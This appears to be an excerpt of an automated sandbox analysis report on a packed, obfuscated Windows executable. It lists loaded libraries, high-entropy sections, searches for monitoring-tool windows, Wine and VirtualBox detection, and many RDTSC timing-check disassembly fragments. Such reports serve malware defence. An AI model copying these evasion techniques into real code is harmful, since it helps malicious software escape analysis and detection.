                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
                Source: Google Drive.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: YouTube.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Sheets.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Gmail.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Slides.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Docs.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: file.exeStatic file information: File size 1849856 > 1048576
                Source: file.exeStatic PE information: Raw size of nxovzswj is bigger than: 0x100000 < 0x19de00
                Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.1849742548.00000000082B0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1947965079.0000000006362000.00000040.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.680000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nxovzswj:EW;guodefnt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nxovzswj:EW;guodefnt:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cce3e should be: 0x1ca19f
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: nxovzswj
                Source: file.exeStatic PE information: section name: guodefnt
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_064FE29C push 1AF8418Ch; mov dword ptr [esp], ecx0_2_064FBB54
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_064FE29C push ebx; mov dword ptr [esp], 0F77E591h0_2_064FD909
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06505650 push esi; mov dword ptr [esp], edx0_2_06505651
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_064FC65D push edx; mov dword ptr [esp], eax0_2_064FC661
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06504649 push ecx; mov dword ptr [esp], 5F9E3228h0_2_0650467D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06504649 push 333344E9h; mov dword ptr [esp], ecx0_2_06504695
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_064FBE6C push ecx; mov dword ptr [esp], esi0_2_064FC1CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_064FBE61 push ebp; mov dword ptr [esp], ecx0_2_064FC257
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_064FCE78 push ecx; mov dword ptr [esp], eax0_2_064FE1B1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06502E1F push edi; mov dword ptr [esp], ebx0_2_0650365A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06504600 push ecx; mov dword ptr [esp], 5F9E3228h0_2_0650467D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06504600 push 333344E9h; mov dword ptr [esp], ecx0_2_06504695
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_064FEE1B push ebp; mov dword ptr [esp], 3F338B27h0_2_065005C7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06504637 push edi; ret 0_2_06504646
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_064FBE27 push 133AB607h; mov dword ptr [esp], eax0_2_064FBE32
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_064FBE27 push edi; mov dword ptr [esp], eax0_2_064FE2A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_064FBE27 push 2C1A184Fh; mov dword ptr [esp], edx0_2_064FE2B1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_064FBE27 push 2744A58Fh; mov dword ptr [esp], eax0_2_064FED9C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_064FD621 push ecx; mov dword ptr [esp], edx0_2_06500132
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_064FD621 push 2802BA72h; mov dword ptr [esp], ebp0_2_06501682
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_064FEE38 push 797E0E4Eh; mov dword ptr [esp], ecx0_2_064FEE51
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_064FEE38 push eax; mov dword ptr [esp], 5A5C5EC7h0_2_064FEE55
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06505E27 push 3D285A86h; mov dword ptr [esp], ebx0_2_06505EAE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06505E27 push 70D614CBh; mov dword ptr [esp], ebx0_2_06505EC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0650762F push ebx; mov dword ptr [esp], edx0_2_06507637
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0650762F push 5DFCDAEBh; mov dword ptr [esp], ebx0_2_06507653
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_064FBECC push 52A8A140h; mov dword ptr [esp], eax0_2_064FBED1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06509EDB push 078729A0h; mov dword ptr [esp], edi0_2_06509FCC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06509EDB push edx; mov dword ptr [esp], 56ED4A92h0_2_0650A002
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0650E6F4 push ebp; retf 0_2_0650E795
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_064FBEF9 push 36067691h; mov dword ptr [esp], ecx0_2_064FE5C4
                Source: file.exeStatic PE information: section name: entropy: 7.9836752439029866
                Source: file.exeStatic PE information: section name: nxovzswj entropy: 7.954513868908687

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3FB0 second address: 6D3FB5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D382C second address: 6D3847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FF17CBED4F3h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F2CF second address: 84F2D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F2D4 second address: 84F2F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FF17CBED4F8h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F2F6 second address: 84F2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F2FC second address: 84F300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F300 second address: 84F304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83D7AC second address: 83D7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83D7B1 second address: 83D7DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF17CC823B3h 0x00000009 jmp 00007FF17CC823B2h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83D7DA second address: 83D7DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E2C7 second address: 84E2CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E2CF second address: 84E2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E580 second address: 84E598 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FF17CC823ABh 0x00000008 jnl 00007FF17CC823A6h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E598 second address: 84E5BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jne 00007FF17CBED4F9h 0x0000000e jmp 00007FF17CBED4F3h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E5BF second address: 84E5C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E5C8 second address: 84E5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E720 second address: 84E724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E88E second address: 84E8D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF17CBED4F1h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FF17CBED4F1h 0x0000001a popad 0x0000001b jnc 00007FF17CBED4ECh 0x00000021 push ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EA13 second address: 84EA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EB90 second address: 84EB94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EB94 second address: 84EBAD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF17CC823AFh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EBAD second address: 84EBB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 851861 second address: 851872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FF17CC823A8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8518E0 second address: 851954 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b jmp 00007FF17CBED4EAh 0x00000010 pop eax 0x00000011 nop 0x00000012 mov ecx, 0424C01Bh 0x00000017 push 00000000h 0x00000019 mov esi, dword ptr [ebp+122D35D8h] 0x0000001f push 6A4D45CBh 0x00000024 jmp 00007FF17CBED4EAh 0x00000029 xor dword ptr [esp], 6A4D454Bh 0x00000030 push 00000003h 0x00000032 xor ecx, 5F25BF96h 0x00000038 push 00000000h 0x0000003a jmp 00007FF17CBED4EAh 0x0000003f push 00000003h 0x00000041 adc dh, 00000075h 0x00000044 push 84D0D3F1h 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c js 00007FF17CBED4E6h 0x00000052 pushad 0x00000053 popad 0x00000054 popad 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 851954 second address: 85198B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 44D0D3F1h 0x0000000f sub edi, dword ptr [ebp+122D352Ch] 0x00000015 lea ebx, dword ptr [ebp+1245178Dh] 0x0000001b stc 0x0000001c xchg eax, ebx 0x0000001d jmp 00007FF17CC823AFh 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jp 00007FF17CC823A6h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85198B second address: 851991 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 851991 second address: 851997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 851A2F second address: 851A9F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FF17CBED4ECh 0x0000000c jp 00007FF17CBED4E6h 0x00000012 popad 0x00000013 nop 0x00000014 jmp 00007FF17CBED4EEh 0x00000019 push 00000000h 0x0000001b and si, 6196h 0x00000020 push 1425E880h 0x00000025 jmp 00007FF17CBED4EEh 0x0000002a xor dword ptr [esp], 1425E800h 0x00000031 jmp 00007FF17CBED4EEh 0x00000036 push 00000003h 0x00000038 and edx, dword ptr [ebp+122D34E4h] 0x0000003e push 00000000h 0x00000040 add edi, dword ptr [ebp+122D21B2h] 0x00000046 push 00000003h 0x00000048 adc dh, FFFFFF81h 0x0000004b push 7650D772h 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 851A9F second address: 851AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 851B85 second address: 851C39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e jo 00007FF17CBED4E9h 0x00000014 movzx esi, cx 0x00000017 push 84C3308Ch 0x0000001c jmp 00007FF17CBED4F1h 0x00000021 add dword ptr [esp], 7B3CCFF4h 0x00000028 call 00007FF17CBED4F5h 0x0000002d movsx esi, di 0x00000030 pop edi 0x00000031 push 00000003h 0x00000033 call 00007FF17CBED4F8h 0x00000038 movsx esi, ax 0x0000003b pop edi 0x0000003c push 00000000h 0x0000003e or dword ptr [ebp+122D22A9h], edi 0x00000044 push 00000003h 0x00000046 push 00000000h 0x00000048 push eax 0x00000049 call 00007FF17CBED4E8h 0x0000004e pop eax 0x0000004f mov dword ptr [esp+04h], eax 0x00000053 add dword ptr [esp+04h], 0000001Ch 0x0000005b inc eax 0x0000005c push eax 0x0000005d ret 0x0000005e pop eax 0x0000005f ret 0x00000060 mov ecx, 07A7EF48h 0x00000065 push 92F75EA2h 0x0000006a push eax 0x0000006b push esi 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 851C39 second address: 851C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 add dword ptr [esp], 2D08A15Eh 0x0000000d pushad 0x0000000e mov bh, 0Fh 0x00000010 mov si, di 0x00000013 popad 0x00000014 lea ebx, dword ptr [ebp+124517A1h] 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007FF17CC823A8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 pushad 0x00000035 push edi 0x00000036 mov dword ptr [ebp+122D54A4h], edx 0x0000003c pop edi 0x0000003d mov edx, edi 0x0000003f popad 0x00000040 mov ecx, eax 0x00000042 xchg eax, ebx 0x00000043 jl 00007FF17CC823B4h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 851C89 second address: 851C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862796 second address: 86279A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86279A second address: 8627A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F46D second address: 86F477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F764 second address: 86F76D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F8CF second address: 86F8D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F8D3 second address: 86F8D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F8D7 second address: 86F8E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F8E2 second address: 86F909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF17CBED4F8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FF17CBED4E6h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FECE second address: 86FED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FED4 second address: 86FED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FED9 second address: 86FEDE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868534 second address: 868551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FF17CBED4EEh 0x0000000d jc 00007FF17CBED4E6h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868551 second address: 86855A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86855A second address: 86858C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF17CBED4F6h 0x0000000e pushad 0x0000000f jmp 00007FF17CBED4F0h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86858C second address: 86859C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF17CC823AAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86859C second address: 8685A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8685A1 second address: 8685B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007FF17CC823A6h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8685B5 second address: 8685BF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF17CBED4E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
